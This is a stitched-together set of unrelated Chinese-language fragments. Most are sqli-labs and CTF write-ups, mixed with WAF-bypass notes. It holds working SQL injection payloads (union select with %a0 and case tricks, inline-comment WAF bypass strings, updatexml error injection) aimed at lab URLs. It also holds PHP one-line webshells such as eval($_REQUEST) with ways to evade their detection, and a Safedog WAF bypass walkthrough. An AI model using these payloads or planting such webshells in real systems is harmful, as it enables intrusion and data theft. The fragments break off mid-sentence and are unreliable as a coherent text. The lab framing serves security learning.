# # # #WAF Bypassing Strings: /*!%55NiOn*/ /*!%53eLEct*/ ,,)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%

开始挑战第二十七关(Trick with SELECT & UNION) 第二十七A关(Trick with SELECT & UNION) 0x1看看源代码 (1)与26关一样,这次去除了逻辑运算符添加了union seclet. 0x2测试 (1)同样利用26关的方式,采取%a0来代替空格 (2) 这里过滤了union select ,所以我们采用大小写方式去绕过,双写是不行的 (3)获取数据库 (4)获取表,查询语句的空格我们采用()来绕过 (5)获取字段名 (6)获取数据 第二十七

union select 联合查询 ,即合并(取交集,结果中没有重复行)前后两个查询:前提是前后查询视图必须拥有相同数量的列,列也必需拥有相同的数据类型. union all select 则取的是两个查询的并集.

SELECT  [id]       ,[AlarmID]       ,[ItemName]       ,[isDeleted]       ,[Remark]   FROM [LjlData].[dbo].[T_BaseDetail] union select 0 ,'','',''-- union 后面的列要和前面一样  而且要类型相同

开始挑战第二十八关(Trick with SELECT & UNION) 第二十八A关(Trick with SELECT & UNION) 0x1看看源代码 (1)与27关一样,只是换了中匹配方式. (2)i表示正在匹配的模式,i是忽略大小写, s就是匹配任意空白字符,制表符啊,换行啊空格啊等 (3)那这样我们就不用空格了,直接采用()来玩,剩下的就是一样的,就不演示了..... 这里采用')闭合就好 第二八A关是同样的,闭合方式同样,但是源代码中只是对union select中过滤了,

Less-1: 核心语句: 无任何防护:回显查询结果或错误内容. 输入单引号闭合语句中的单引号,#注释后面的内容,即可注入.由于有查询结果回显,直接联合注入即可. 1'order by x #(有些环境下#天然不行,需要使用--+或--空格) 探测查询的列数:union select要求前后查询列数必须一致,但语句中的*让我们无法知晓列数.order by语句当x大于列数时报错,小于等于时无回显.最后测得列数为3. ' union select 1,2,group_concat(table_na

0x00 原理   思路来自美团杯2021,本来说出题人已经把select通过正则过滤了,就不该总是往用select进行查询那方面想-> select id from users where username='admin' and password='admin' 0x01 绕过方法   首先我们测出or没被过滤,and被过滤,||没被过滤,异或没被过滤,但是select被过滤了,如果纠结于用盲注,那么就必须要用到select. 然后题目还过滤了单引号,可以用到之前那篇随笔我提到的方法.通过

看一下过滤函数 看一下/s是什么东西 那直接通过大小写就可以绕过了 http://192.168.136.128/sqli-labs-master/Less-27/?id=0'%a0uNion%a0sElect%a01,2,%273

和less28没什么区别,直接上个payload吧 http://192.168.136.128/sqli-labs-master/Less-28a/?id=0')%a0uNion%a0sElect%a01,2,('3 这样也行 http://192.168.136.128/sqli-labs-master/Less-28a/?id=0')%a0uNion%a0sElect%a01,2,3;%00

这个不是基于错误的吧,看源码可以知道错误并没有输出 那就使用;%00和order by试一下 http://192.168.136.128/sqli-labs-master/Less-28/?id=1')%a0order%a0by%a03;%00 http://192.168.136.128/sqli-labs-master/Less-28/?id=1')%a0order%a0by%a04;%00 http://192.168.136.128/sqli-labs-master/Less-28/?

和less 27一样,单引号换双引号 http://192.168.136.128/sqli-labs-master/Less-27a/?id=0"%a0uNion%a0sElect%a01,2,"3

############# [0×00] – 简介[0×01] – 过滤规避(Mysql)[0x01a] – 绕过函数和关键词的过滤[0x01b] – 绕过正则表达式过滤[0×02] – 常见绕过技术[0×03] – 高级绕过技术[0x03a] – HTTP参数污染:分离与结合[0x03b] – HTTP参数参杂[0×04] – 如何保护你的网站[0×05] – 总结[0×06] – 参考[0×07] – 致谢 ######################## [0×01] – 简介 #####

参数拦截:script.空格and空格.空格or空格.union select.user() 绕过: and.order by绕过:  内联注释 union select绕过: union%23%0a%23%0aSeLecT/**/1,2,3 user()绕过 : user%23%0a()

整理下sql相关知识,查漏补缺(长期更新) 1 常用语句及知识 information_schema包含了大量有用的信息,例如下图 mysql.user下有所有的用户信息,其中authentication_string为用户密码的hash,如果可以使用可以修改这个值,那么就可以修改任意用户的密码 常用语句 当前用户:select user() 数据库版本:select version() , select @@version 数据库名:select database() 操作系统:select

安装 安装 - Linux 前提:检查selinux状态 - 关闭selinux getenforce #显示为disabled则为关闭 .下载 x86:wget http://download.yunsuo.com.cn/v3/yunsuo_agent_32bit.tar.gz && tar xvzf yunsuo_agent_32bit.tar.gz && chmod +x yunsuo_install/install && yunsuo_install

1.SQL注入 手工bypass要点 先通过破坏关键字测试出拦截规则 之后进行针对性绕过 1.Mysql 1.1.联合注入 0x01 and绕过 直接 and 1=1 直接就会被拦截 在数值的前面加特殊符号干扰匹配规则进行绕过 在这里使用 取反符号'-'或者取逻辑位非运算符号'~'进行绕过 +图片 mysql> select ~1; +----------------------+ | ~1 | +----------------------+ | 18446744073709551614 |

第二十一关 第二十一关我们正常登陆后看到,uname后面变成了一堆字母 这是经过base64编码之后的样子,所以就照葫芦画瓢,将我payload的uname后面的部分转码成base64,这里可以用正常的注入套路order by等一步步走,但为了方便我直接用报错注入,但这里注意闭合是') uname=admin') and updatexml(1,concat(0x7e,(select database())),0) # 将uname=后面的部分都base64编码一下 uname=YWRtaW4n

这道题,也是费了很大的劲,慢慢理解慢慢消化,今天,才开始把wp写出来 首先我们先扫描一波目录,用dirsearch扫一手,发现有robots.txt文件 dirseach自带的字典在db目录下,使用格式以及常用参数如下:py dirsearch.py -u [target url] -e * -u后面跟要扫的url -e是指定的url -w是指定字典 -r递归目录 --random-agents使用随机UA 然后,我们紧接着用御剑扫一手,发现了flag.php,然后我们显示访问robots.tx

最近想着把过waf相关的整理一下,本次主要以安全狗4.0为例进行演示 准备工作 安全狗官网:http://free.safedog.cn/install_desc_website.html环境:Windows10+phpstudy+sqli-labs+安全狗v4.0 安装工作 1.下载安全狗 2.查看Apache服务是否存在 在这之前要先查看服务里有没有Apache,一般是用PHPstudy集成环境测试的话,是没有这个服务的,需要自己手动添加一下 ,cd到phpstudy的apache2/bin

WebShell-ByPass php一句话木马 <?php eval($_REQUEST['a']]);?> 拦截进行替换 替换eval() assert() 替换$_REQUEST['a'] 写$_REQUEST无报错,加上 '[]' 后报错 利用end()绕过,end()函数的意义:输出数组中当前元素和最后一个元素的值 <?php eval(end($_REQUEST)); ?> 当用菜刀连接时,无需密码 通过常量的定义 <?php define("a&quo